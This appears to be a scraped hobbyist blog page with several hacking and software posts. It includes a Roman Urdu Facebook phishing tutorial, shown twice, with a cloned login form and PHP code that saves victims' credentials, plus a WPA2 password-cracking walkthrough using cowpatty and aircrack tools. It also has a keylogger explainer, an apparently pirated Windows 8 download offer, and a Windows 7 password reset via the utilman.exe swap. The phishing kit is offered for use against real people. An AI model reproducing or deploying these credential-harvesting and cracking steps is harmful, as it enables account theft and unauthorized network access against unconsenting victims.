Song OF the Day

ALLAH

ALLAH is enough for me

Dr. Of Your Pc

DR. PC provide you All types of softwares for your PC

Sunday, 17 November 2013

How Hackers hack Facebook and other accounts using a keylogger

Introduction
A keylogger is software that once installed in a computer, it starts working in the background without making its presence felt, A keylogger records all the keystokes on the computer.
Some modern keyloggers have many other functions which give hackers the ability to capture the screen shot and even their images using web cameras without and permission of the victim.
Using a keylogger in our own computer is 100% legal. It is mostly used by businessmen to keep an eye on their employs.
L314xH369_jpg_spyware-9dc90
How hackers hack with keylogger
keylogger wasn’t really created for hacking purposes but hackers use this useful tool for their advantage and are now mostly used for hacking email accounts and social accounts.
To hack someone with keylogger hacker firsts creates a Remote file (virus) using keylogger and with their skills of social engineering they make their victim run that file on their computer , keylogger is usually banded with others software to fool the victims and to bypass the firewall. Once the remote file starts running on the victim’s pc the hacker start receiving all the keystrokes and everything typed
on victim’s Computer and the next time he/she (victim) logs into his/her account the hacker will get the login details and he/she will be screwed.
HOW TO PROTECT YOURSELF FROM KEYLOGGERS.
Always use a good and updated antivirus program.
Use online virus scanners to scans files you receive or download from the internet.
Never use pirated software they are mostly blinded with remote files and may infect your computer

For More detail

How to hack Facebook account with phishing attack method Explained in Urdu and Hindi

Asalam o Alekum dosto ajj me app dosto ko facebook haking karny ka tareeka samjhau ga jo log english theek sy nhe samaj sakty ya english me likhy takreeky ko asani sy nhe samaj sakty wo yeh article phar kar asani sy facebook account hack karna seekh sakty hain.

jo dost English me facebook hacking sekhna chaty hain wo Yahan Click Karin.
images6586

Phishing Attack
Subsy phely appko batata chalu k facebook k accounts hack akrny k liay koi software nhe hota iss ko phishing k sy hack kia ja sakta ha , ab sawal yeh ha k phishing kia hota ha??????
phishing aik asa tareeka ha jiss me hacker nakli website banata ha jo facebook k login page ki taran lagti ha aur aus me apny shikar (victim) (jiss ko hack karna ho) aus sy log in karwata ha jese he apka shekar aus me apni id aur password likhy ga aus ki id aur password app k pass aa jge ga. hahahaha :D :D :D :P :P :P
tu bagiar waqt zaya kiay suru karty hain.
 How to hack Facebook account with phishing
Facebook account hack karny k liay appko 2 cheezo ki zaroorat hoge.
1. nakli facebook ka login page apny shekar ko phansany k liay.
2. webhosting site jiss me app wo nakli page dal sakain.
How to make a Facebook Phishing page?
Facebook ka nakli page iss taran banain:
1.Yahan click karin aur facebook k log in page py jain wahan ja kr Ctrl+U dabain aur apko screen py codes likhay huay nazar ain gy phr aus sary code ko copy karin aur  apny computer me notepad me paste akr daian.
2. Notepad me save karny k bad Ctrl+F press karin aur   action=”/login.php?login_attempt=1″  search karin
aus k bad aus line ko iss line ko mita kr (remove kar k)  yeh paste karin action =“pass.php”

3.ab yeh changes karny k bad aus file ko .html format me save karin aur name index.html rakh dain.
4. ab aik new notepad file open karin aur aus me yeh code paste karin aur aus notepad ko pass.php k name sy save kr dain.
<?php
header (‘Location: https://www.facebook.com’);
$handle = fopen(“passwords.html”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
How to Upload Phishing Page to a  Web hosting site ?
Ab apko wo 2 files pass.php aur index.html webhosting site py upload karni hain jiss k liay app yahan accoun banain.
1.ab sign up karin aur register hon aus k bad “Use a free subdomain” k option me ja kr free subdomain banain kisi b name sy.
2.aus k bad apni email id me check karin apko aik email i hoege jiss me apki site ki info hoge.
3. ab apny 000webhost k account me login karin aur  File Manager me jain aus k bad  public_html directory me jain aur apni do files pass.php aur index.html wahan uplaod kar dain.
ab apni free sub domain ka link victim ko send karin aur aur jese he wo aus me log in kary ga wo public_html directory me passwords.txt me ain gy.
ya ap yahan ja kar b passwords dekh sakty hain
www.yoursite.com/passwords.html (yoursite.com ko apni subdomain k name sy badal dain )




Windows 8 free download (direct link to downlaod ISO)

As you know windows 8 IS very awesome it has all the features of windows 7 and its is specially designed for touch PCs as it has many features it is very much costly but from here you can download its ISO for free.
WINDOWS 8 FREE ISO DOWNLAOD
Download it from                  HERE

How to hack Facebook account with phishing attack method Explained in Urdu and Hindi

Asalam o Alekum dosto ajj me app dosto ko facebook haking karny ka tareeka samjhau ga jo log english theek sy nhe samaj sakty ya english me likhy takreeky ko asani sy nhe samaj sakty wo yeh article phar kar asani sy facebook account hack karna seekh sakty hain.

jo dost English me facebook hacking sekhna chaty hain wo Yahan Click Karin.
images6586

Phishing Attack
Subsy phely appko batata chalu k facebook k accounts hack akrny k liay koi software nhe hota iss ko phishing k sy hack kia ja sakta ha , ab sawal yeh ha k phishing kia hota ha??????
phishing aik asa tareeka ha jiss me hacker nakli website banata ha jo facebook k login page ki taran lagti ha aur aus me apny shikar (victim) (jiss ko hack karna ho) aus sy log in karwata ha jese he apka shekar aus me apni id aur password likhy ga aus ki id aur password app k pass aa jge ga. hahahaha :D :D :D :P :P :P
tu bagiar waqt zaya kiay suru karty hain.
 How to hack Facebook account with phishing
Facebook account hack karny k liay appko 2 cheezo ki zaroorat hoge.
1. nakli facebook ka login page apny shekar ko phansany k liay.
2. webhosting site jiss me app wo nakli page dal sakain.
How to make a Facebook Phishing page?
Facebook ka nakli page iss taran banain:
1.Yahan click karin aur facebook k log in page py jain wahan ja kr Ctrl+U dabain aur apko screen py codes likhay huay nazar ain gy phr aus sary code ko copy karin aur  apny computer me notepad me paste akr daian.
2. Notepad me save karny k bad Ctrl+F press karin aur   action=”/login.php?login_attempt=1″  search karin
aus k bad aus line ko iss line ko mita kr (remove kar k)  yeh paste karin action =“pass.php”

3.ab yeh changes karny k bad aus file ko .html format me save karin aur name index.html rakh dain.
4. ab aik new notepad file open karin aur aus me yeh code paste karin aur aus notepad ko pass.php k name sy save kr dain.
<?php
header (‘Location: https://www.facebook.com’);
$handle = fopen(“passwords.html”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
How to Upload Phishing Page to a  Web hosting site ?
Ab apko wo 2 files pass.php aur index.html webhosting site py upload karni hain jiss k liay app yahan accoun banain.
1.ab sign up karin aur register hon aus k bad “Use a free subdomain” k option me ja kr free subdomain banain kisi b name sy.
2.aus k bad apni email id me check karin apko aik email i hoege jiss me apki site ki info hoge.
3. ab apny 000webhost k account me login karin aur  File Manager me jain aus k bad  public_html directory me jain aur apni do files pass.php aur index.html wahan uplaod kar dain.
ab apni free sub domain ka link victim ko send karin aur aur jese he wo aus me log in kary ga wo public_html directory me passwords.txt me ain gy.
ya ap yahan ja kar b passwords dekh sakty hain
www.yoursite.com/passwords.html (yoursite.com ko apni subdomain k name sy badal dain )




Top Ten Free Wi-Fi Security Test Tools

All new Wi-Fi CERTIFIED products support WPA2 (AES-CCMP) security, but that's not enough to harden a WLAN against attack. Breaches can still be caused by policy, configuration, and coding mistakes, overly-friendly clients, or unauthorized APs. Continuous surveillance and periodic assessments are important to spot (and then patch!) these and other WLAN vulnerabilities.
You can't conduct a thorough assessment with just one tool, no matter how great the tool. A well-stocked pentest kit includes many tools – some simple, some sophisticated; some free, some not. Ultimately, the "best" toolkit depends on network size, risk tolerance, budget, and personal preference. Commercial tools can save time and effort, but they aren't for everyone. So here we list our favorite free (open source or beggar-ware) wireless security test tools.
10) Android WiFi Analyzer: The first step in any Wi-Fi assessment is to explore your surroundings for surprises on the 2.4 and 5 GHz bands. Free WLAN discovery tools exist for nearly every OS, from the infamous Win32 NetStumbler to Meraki's Java Cloud Stumbler. Our current fave is the Android WiFi Analyzer. With this handy tool, we can record SSIDs and APs, graph real-time channel usage and signal strength, and even locate selected APs – using nothing more than the smartphone in our pocket.
How Three Cyber Threats Transform Incident Response: Targeted Attacks, System Exploits, Data Theft, and You

9) Heatmapper: Figuring out where APs are located so that you can identify their owner and threat level can be tedious. Ekahau's free Heatmapper (Win32) is a convenient way to map APs in a small area. Just import a floorplan (or use the default grid) and perform a slow walk-about, pausing to click on your location. After a few minutes (max 15), let Heatmapper plot RF footprints for every AP it heard--often with pretty good accuracy.
8) Kismet: Linux fans know that Kismet is a Wi-Fi Swiss Army knife--it discovers APs and clients, captures Wi-Fi packets from local NICa or remote drones, and can generate alerts for fingerprinted recon activities. Kismet is a versatile client/server tool that can be paired with any RFMON-capable adapter--even on OS X or Cygwin. Using Kismet, you can enumerate discovered APs and clients, helping you spot policy violations like misconfigured APs or misbehaving clients.
7) Wireshark: Sometimes, you have to drill into captured packets to investigate suspicious findings, such as unauthorized apps on your WLAN. When it comes to free WLAN analyzers, nothing beats the cross-platformWireshark. With the right adapter, Wireshark enables live Wi-Fi analysis on nearly any OS--including Windows. Alternatively, Wireshark can analyze capture files long after you return to the office.
6) Nmap: An assessment should also include taking a hard look at WLAN infrastructure devices: APs, controllers, gateways, and switches that Wi-Fi intruders could try to compromise. Pentests must be performed while connected to every AP and SSID, scanning subnets and VLANs for leaks and probing devices for vulnerable services. Although this process might be different with Wi-Fi, tools don't have to be. We often use our favorite cross-platform TCP/IP scanner Nmap.
5) Nessus: Wireless infrastructure and clients must be hardened like any DMZ device. Many documented Wi-Fi exploits take advantage of poorly-designed Web admin interfaces and coding errors. Here again, general-purpose pentest tools like SARA, Metasploit, and Nessus can be helpful – for example, Nessus can spot many Web app, AP default password, and Wi-Fi driver vulnerabilities.
4) WiFiDEnum: Speaking of Wi-Fi drivers, just about every NIC vendor has made a mistake or two, like failing to parse 802.11 Information Elements correctly or crashing on too-long or missing SSIDs. Wi-Fi driver vulnerabilities are important to detect because drivers are not routinely patched and they run at a low level, where arbitrary code execution can have serious consequences. WiFiDEnum is an easy way to enumerate Wi-Fi drivers (and versions) on every Windows host in your network.
3) Aircrack-ng: Other common Wi-Fi client exposures include weak configurations (e.g., accepting Ad Hoc requests or probing for FreePublicWiFi) and authentication mistakes (e.g., failure to validate 802.1X server identity, easily-guessed pre-shared keys). Many free tools are readily available to "crack" WEP keys or WPA/WPA2-PSKs, including our favorite: Aircrack-ng. This suite of tools comes in handy for many tasks, including discovery, packet capture, forced deauthentication, and WEP/PSK analysis.
2) MDK3: An essential aspect of Wi-Fi vulnerability assessment is exercising your WLAN's policies and countermeasures, looking for blind spots, mistakes, and attacks that can overwhelm your APs, controllers, or IPS. In other words, attacking yourself to validate your defenses. There are many tools that can be used for this, but one of our favorites is MDK3, a command-line utility that can guess hidden SSIDs and MAC ACLs, look for clients vulnerable to authentication downgrade, initiate Wi-Fi Beacon, Deauth, and TKIP MIC DoS attacks, and generally wreak havoc.
1) Karmetasploit: Finally, Wi-Fi clients can be too friendly, connecting to any AP and using sensitive apps without requiring server authentication. Tools like Karma, AirPwn, and Wi-Fish Finder can find clients vulnerable to Wi-Fi based (Evil Twin) man-in-the-middle attacks and teach you about their consequences. Our favorite is Karmetasploit: Karma, running on the Metasploit Framework. If you're responsible for securing Wi-Fi clients and haven't seen this one in action, you really should check it out.
These and hundreds of other Wi-Fi security tools are readily available as Internet downloads. However, your ability to run them depends upon test platform, OS, and Wi-Fi adapter(s). A good way to get started is to download a LiveCD/DVD/USB Linux distro for Wi-Fi pentesting. Our recommendation: BackTrack4, which includes many of the above-mentioned free Wi-Fi security tools.

How to Hack Wi-Fi: Cracking WPA2-PSK Passwords with Cowpatty

Welcome, my hacker
As part of my series on hacking Wi-Fi, I want to demonstrate another excellent piece of hacking software for cracking WPA2-PSK passwords. In my last post, we cracked WPA2 using aircrack-ng. In this tutorial, we'll use a piece of software developed by wireless security researcher Joshua Wright calledcowpatty (often stylized as coWPAtty). This app simplifies and speeds up the dictionary/hybrid attack against WPA2 passwords, so let's get to it!

Step 1: Find the Cowpatty

Cowpatty is one of the hundreds of pieces of software that are included in the BackTrack suite of software. For some reason, it was not placed in the/pentest/wireless directory, but instead was left in the /usr/local/bindirectory, so let's navigate there.
  • cd /usr/local/bin
Because cowpatty is in the /usr/local/bin directory and this directory should be in your PATH, we should be able to run it from any directory in BackTrack.

Step 2: Find the Cowpatty Help Screen

To get a brief rundown of the cowpatty options, simply type:
  • cowpatty
BackTrack will provide you a brief help screen. Take a note that cowpatty requires all of the following.
  • a word list
  • a file where the password hash has been captured
  • the SSID of the target AP

Step 3: Place the Wireless Adapter in Monitor Mode

Just as in cracking with aircrack-ng, we need to put the wireless adapter into monitor mode.
  • airmon-ng start wlan0

Step 4: Start a Capture File

Next, we need to start a capture file where the hashed password will be stored when we capture the 4-way handshake.
  • airodump-ng --bssid 00:25:9C:97:4F:48 -c 9 -w cowpatty mon0
This will start a dump on the selected AP (00:25:9C:97:4F:48), on the selected channel (-c 9) and save the the hash in a file named cowcrack.

Step 5: Capture the Handshake

Now when someone connects to the AP, we'll capture the hash and airdump-ng will show us it has been captured in the upper right-hand corner.

Step 6: Run the Cowpatty

Now that we have the hash of the password, we can use it with cowpatty and our wordlist to crack the hash.
  • cowpatty -f /pentest/passwords/wordlists/darkc0de.lst -r /root/cowcrack-01.cap -s Mandela2
As you can see in the screenshot above, cowpatty is generating a hash of every word on our wordlist with the SSID as a seed and comparing it to the captured hash. When the hashes match, it dsplays the password of the AP.

Step 7: Make Your Own Hash

Although running cowpatty can be rather simple, it can also be very slow. The password hash is hashed with SHA1 with a seed of the SSID. This means that the same password on different SSIDs will generate different hashes. This prevents us from simply using a rainbow table against all APs. Cowpatty must take the password list you provide and compute the hash with the SSID for each word. This is very CPU intensive and slow.
Cowpatty now supports using a pre-computed hash file rather than a plain-text word file, making the cracking of the WPA2-PSK password 1000x faster! Pre-computed hash files are available from the Church of WiFi, and these pre-computed hash files are generated using 172,000 dictionary file and the 1,000 most popular SSIDs. As useful as this is, if your SSID is not in that 1,000, the hash list really doesn't help us.
In that case, we need to generate our own hashes for our target SSID. We can do this by using an application called genpmk. We can generate our hash file for the "darkcode" wordlist for the SSID "Mandela2" by typing:
  • genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d hashes -s Mandela2

Step 8: Using Our Hash

Once we have generated our hashes for the particular SSIDs, we can then crack the password with cowpatty by typing:
  • cowpatty -d hashfile -r dumpfile -s ssid

Stay Tuned for More Wireless Hacking Guides

Keep coming back for more on Wi-Fi hacking and other hacking techniques! Haven't seen the other Wi-Fi hacking guides yet? Check them out here. If you have questions on any of this, please ask them in the comments below. If it's something unrelated, try asking in the Null Byte forum.
FROM

Friday, 15 November 2013

How To Reset a Windows 7 Password

If you need to reset the password to Windows 7 on your computer, likely because you've forgotten it, let me first assure you that not only is this very possible, it's not even that difficult.
Unfortunately, aside from a password reset disk (discussed in Step 14 below) there is no Windows-provided way to reset a Windows 7 password. Luckily, there is the clever password reset trick I've outlined below that's easy enough for anyone to try.
Prefer screen shots? Try my Step by Step Guide to Resetting a Windows 7 Password for an easy walk-through!
Note: There are several additional ways to reset or recover a forgotten Windows 7 password, includingpassword recovery software. For a full list of options, see my Help! I Forgot My Windows 7 Password!.
If you do know your password and just want to change it, see How To Change Your Windows 7 Password for help with that.
Follow these easy steps to reset your Windows 7 password:
Difficulty: Average
Time Required: Due to the several steps involved, it could take 30 to 60 minutes to reset your Windows 7 password

Here's How:

  1. Insert either your Windows 7 installation DVD, or a Windows 7 System Repair disc, into your optical drive and then restart your computer. If you have either on a flash drive, that'll work too.
    Tip: See How to Boot From a CD, DVD, or BD Disc or How to Boot From a USB Device if you've never booted from portable media before or if you're having trouble doing so.
    Note: If you don't have original Windows 7 media and never got around to making a system repair disc, don't worry. As long as you have access to any other Windows 7 computer (another in your home or a friend's will work fine), you can burn a system repair disc for free. See How to Create a Windows 7 System Repair Disc for a tutorial.
  2. After your computer boots from the disc or flash drive, click Next on the screen with your language and keyboard choices.
    Tip: Don't see this screen or do you see your typical Windows 7 logon screen? Chances are good that your computer booted from your hard drive (like it normally does) instead of from the disc or flash drive you inserted, which is what you want. See the appropriate link in the tip from Step 1 above for help.
  3. Click on the Repair your computer link.
    Note: If you booted with a system repair disc instead of a Windows 7 installation disc or flash drive, you won't see this link. Just move on to Step 4 below.
  4. Wait while your Windows 7 installation is located on your computer.
  5. Once your installation is found, take note of the drive letter found in the Location column. Most Windows 7 installations will show D: but yours may be different.
    Note: While in Windows, the drive that Windows 7 is installed on is probably labeled as the C: drive. However, when booting from Windows 7 install or repair media, a hidden drive is available that usually isn't. This drive is given the first available drive letter, probably C:, leaving the next available drive letter, probably D:, for the next drive - the one with Windows 7 installed on it.
  6. Select Windows 7 from the Operating System list and then click the Next button.
  7. From System Recovery Options, choose Command Prompt.
  8. With Command Prompt now open, execute the following two commands, in this order:
    copy d:\windows\system32\utilman.exe d:\
    
    copy d:\windows\system32\cmd.exe d:\windows\system32\utilman.exe
    
    To the Overwrite question after executing the second command, answer with Yes.
    Important: If the drive that Windows 7 is installed on in your computer is not D: (Step 5), be sure to change all instances of d: in the commands above with the correct drive letter.
  9. Remove the disc or flash drive and then restart your computer.
    You can close the Command Prompt window and click Restart but it's also okay in this situation to restart using your computer's restart button.
  10. Once the Windows 7 logon screen appears, locate the little icon on the bottom-left of the screen that looks like a pie with a square around it and then click it!
    Tip: If your normal Windows 7 logon screen did not show up, check to see that you removed the disc or flash drive you inserted in Step 1. Your computer may continue to boot from this device instead of your hard drive if you don't remove it.
  11. Now that Command Prompt is open, execute the net user command as shown, replacingmyusername with whatever your user name is and mypassword with whatever new password you'd like to use:
    net user myusername mypassword
    
    So, for example, I would do something like this:
    net user Tim 1lov3blueberrie$
    
    Tip: If your username has spaces, put double quotes around it when executing net user, as in net user "Tim Fisher" 1lov3blueberrie$.
  12. Close the Command Prompt window.
  13. Login with your new password!
  14. Create a Windows 7 Password Reset Disk! This is the Microsoft-approved, proactive step you should have done a long time ago. All you need is a blank flash drive or floppy disk and you'll never need to worry about forgetting your Windows 7 password again.
  15. While not required, it would probably be wise to undo the hack that makes this work. If you don't, you won't have access to accessibiily features from the Windows 7 login screen.
    To reverse the changes you've made, repeat Steps 1 through 7 above. When you have access to Command Prompt again, execute the following:
    copy d:\utilman.exe d:\windows\system32\utilman.exe
    
    Confirm the overwrite and then restart your computer.
    Important: Undoing this hack will have no impact on your new password. Whatever password you set in Step 11 is still valid.